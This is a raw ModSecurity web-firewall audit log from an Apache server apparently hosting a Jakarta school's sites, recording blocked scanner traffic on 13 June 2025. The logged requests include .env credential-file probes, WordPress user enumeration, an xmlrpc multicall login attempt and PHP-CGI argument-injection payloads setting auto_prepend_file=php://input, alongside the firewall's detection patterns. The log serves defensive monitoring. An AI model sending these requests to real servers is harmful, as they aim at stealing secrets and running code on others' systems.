ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57f36f08-Z-- --96b45d3d-A-- [13/Jun/2025:16:23:22 +0700] aEvuCu9dCOerv4VGhqThlAAAAAY 103.236.140.4 36998 103.236.140.4 8181 --96b45d3d-B-- GET /.env.production HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --96b45d3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96b45d3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602962675 859 (- - -) Stopwatch2: 1749806602962675 859; combined=290, p1=254, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96b45d3d-Z-- --ba6bd539-A-- [13/Jun/2025:16:23:54 +0700] aEvuKu9dCOerv4VGhqTh_gAAABg 103.236.140.4 38172 103.236.140.4 8181 --ba6bd539-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ba6bd539-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba6bd539-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806634296936 716 (- - -) Stopwatch2: 1749806634296936 716; combined=263, p1=229, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba6bd539-Z-- --f1f1784b-A-- [13/Jun/2025:16:23:56 +0700] aEvuLB1N9VxFJpQ5cVhvigAAAI0 103.236.140.4 38256 103.236.140.4 8181 --f1f1784b-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f1f1784b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1f1784b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806636197370 746 (- - -) Stopwatch2: 1749806636197370 746; combined=273, p1=237, p2=0, p3=0, p4=0, p5=35, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1f1784b-Z-- --a50fc614-A-- [13/Jun/2025:16:46:58 +0700] aEvzkv8ql0QLmijbYWZxugAAAFQ 103.236.140.4 59186 103.236.140.4 8181 --a50fc614-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.166.5 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.166.5 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a50fc614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a50fc614-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749808018167389 823 (- - -) Stopwatch2: 1749808018167389 823; combined=334, p1=291, p2=0, p3=0, p4=0, p5=42, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a50fc614-Z-- --f571e82c-A-- [13/Jun/2025:17:38:07 +0700] aEv_j-9dCOerv4VGhqQIqQAAAAE 103.236.140.4 56338 103.236.140.4 8181 --f571e82c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.205.46.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.205.46.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f571e82c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f571e82c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749811087974086 2476 (- - -) Stopwatch2: 1749811087974086 2476; combined=1337, p1=400, p2=903, p3=0, p4=0, p5=33, sr=136, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f571e82c-Z-- --bc362329-A-- [13/Jun/2025:18:32:48 +0700] aEwMYO9dCOerv4VGhqQowAAAABM 103.236.140.4 38362 103.236.140.4 8181 --bc362329-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.245.112.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.245.112.162 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --bc362329-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc362329-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749814368269006 2846 (- - -) Stopwatch2: 1749814368269006 2846; combined=1277, p1=414, p2=836, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc362329-Z-- --6320c044-A-- [13/Jun/2025:18:32:49 +0700] aEwMYR1N9VxFJpQ5cVijKAAAAIs 103.236.140.4 38402 103.236.140.4 8181 --6320c044-B-- POST /xmlrpc.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.245.112.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.245.112.162 X-Forwarded-Proto: http Connection: close Content-Length: 485 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/xml --6320c044-C-- system.multicall methodNamewp.getUsersBlogsparamsadminAŽERTY --6320c044-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6320c044-E-- --6320c044-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||103.236.140.4|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1749814369069548 6184 (- - -) Stopwatch2: 1749814369069548 6184; combined=5041, p1=459, p2=4174, p3=31, p4=34, p5=220, sr=76, sw=123, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6320c044-Z-- --616a013f-A-- [13/Jun/2025:19:07:49 +0700] aEwUlf8ql0QLmijbYWatzgAAAEQ 103.236.140.4 35072 103.236.140.4 8181 --616a013f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 210.213.140.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 210.213.140.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --616a013f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --616a013f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749816469232303 3426 (- - -) Stopwatch2: 1749816469232303 3426; combined=2016, p1=589, p2=1392, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --616a013f-Z-- --1c133050-A-- [13/Jun/2025:20:57:47 +0700] aEwuW-9dCOerv4VGhqSBfwAAABg 103.236.140.4 53910 103.236.140.4 8181 --1c133050-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Googlebot-News Accept-Charset: utf-8 --1c133050-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c133050-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749823067218077 781 (- - -) Stopwatch2: 1749823067218077 781; combined=335, p1=295, p2=0, p3=0, p4=0, p5=40, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c133050-Z-- --4d970a01-A-- [13/Jun/2025:20:57:56 +0700] aEwuZO9dCOerv4VGhqSBqgAAABY 103.236.140.4 54408 103.236.140.4 8181 --4d970a01-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept-Charset: utf-8 --4d970a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d970a01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749823076718113 771 (- - -) Stopwatch2: 1749823076718113 771; combined=340, p1=303, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d970a01-Z-- --353ecf0a-A-- [13/Jun/2025:21:10:04 +0700] aEwxPP8ql0QLmijbYWbuYgAAAE0 103.236.140.4 35102 103.236.140.4 8181 --353ecf0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --353ecf0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --353ecf0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749823804408026 807 (- - -) Stopwatch2: 1749823804408026 807; combined=375, p1=334, p2=0, p3=0, p4=0, p5=41, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --353ecf0a-Z-- --08069674-A-- [13/Jun/2025:21:10:07 +0700] aEwxP8mhAKaFi0V9-RN0cgAAANQ 103.236.140.4 35234 103.236.140.4 8181 --08069674-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --08069674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08069674-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749823807332044 730 (- - -) Stopwatch2: 1749823807332044 730; combined=334, p1=297, p2=0, p3=0, p4=0, p5=37, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08069674-Z-- --c99e7c00-A-- [13/Jun/2025:21:33:15 +0700] aEw2qx1N9VxFJpQ5cVgScgAAAI4 103.236.140.4 47082 103.236.140.4 8181 --c99e7c00-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 173.242.108.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.242.108.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c99e7c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c99e7c00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749825195014697 2666 (- - -) Stopwatch2: 1749825195014697 2666; combined=1432, p1=439, p2=957, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c99e7c00-Z-- --07f9a261-A-- [13/Jun/2025:22:06:08 +0700] aEw-YO9dCOerv4VGhqStHwAAAAs 103.236.140.4 44236 103.236.140.4 8181 --07f9a261-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.166.5 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.166.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --07f9a261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07f9a261-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749827168294934 812 (- - -) Stopwatch2: 1749827168294934 812; combined=341, p1=298, p2=0, p3=0, p4=0, p5=42, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07f9a261-Z-- --8192b175-A-- [13/Jun/2025:22:13:50 +0700] aExALu9dCOerv4VGhqSwlgAAAAk 103.236.140.4 58698 103.236.140.4 8181 --8192b175-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.39.93.93 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.39.93.93 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --8192b175-C-- --8192b175-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8192b175-E-- --8192b175-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749827630360357 4415 (- - -) Stopwatch2: 1749827630360357 4415; combined=3104, p1=409, p2=2672, p3=0, p4=0, p5=23, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8192b175-Z-- --1ff4370f-A-- [13/Jun/2025:22:37:25 +0700] aExFtR1N9VxFJpQ5cVgxEQAAAJU 103.236.140.4 45028 103.236.140.4 8181 --1ff4370f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --1ff4370f-C-- --1ff4370f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ff4370f-E-- --1ff4370f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749829045031713 4256 (- - -) Stopwatch2: 1749829045031713 4256; combined=2584, p1=517, p2=2024, p3=0, p4=0, p5=43, sr=122, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ff4370f-Z-- --79622012-A-- [13/Jun/2025:23:08:30 +0700] aExM_smhAKaFi0V9-RPViAAAAMA 103.236.140.4 55914 103.236.140.4 8181 --79622012-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.75.35.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.75.35.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --79622012-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79622012-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749830910581952 2540 (- - -) Stopwatch2: 1749830910581952 2540; combined=1289, p1=416, p2=844, p3=0, p4=0, p5=29, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79622012-Z-- --f30a0304-A-- [13/Jun/2025:23:23:45 +0700] aExQke9dCOerv4VGhqTf3wAAABg 103.236.140.4 48710 103.236.140.4 8181 --f30a0304-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.172.91.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.91.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.4 Safari/537.36 Accept-Charset: utf-8 --f30a0304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f30a0304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 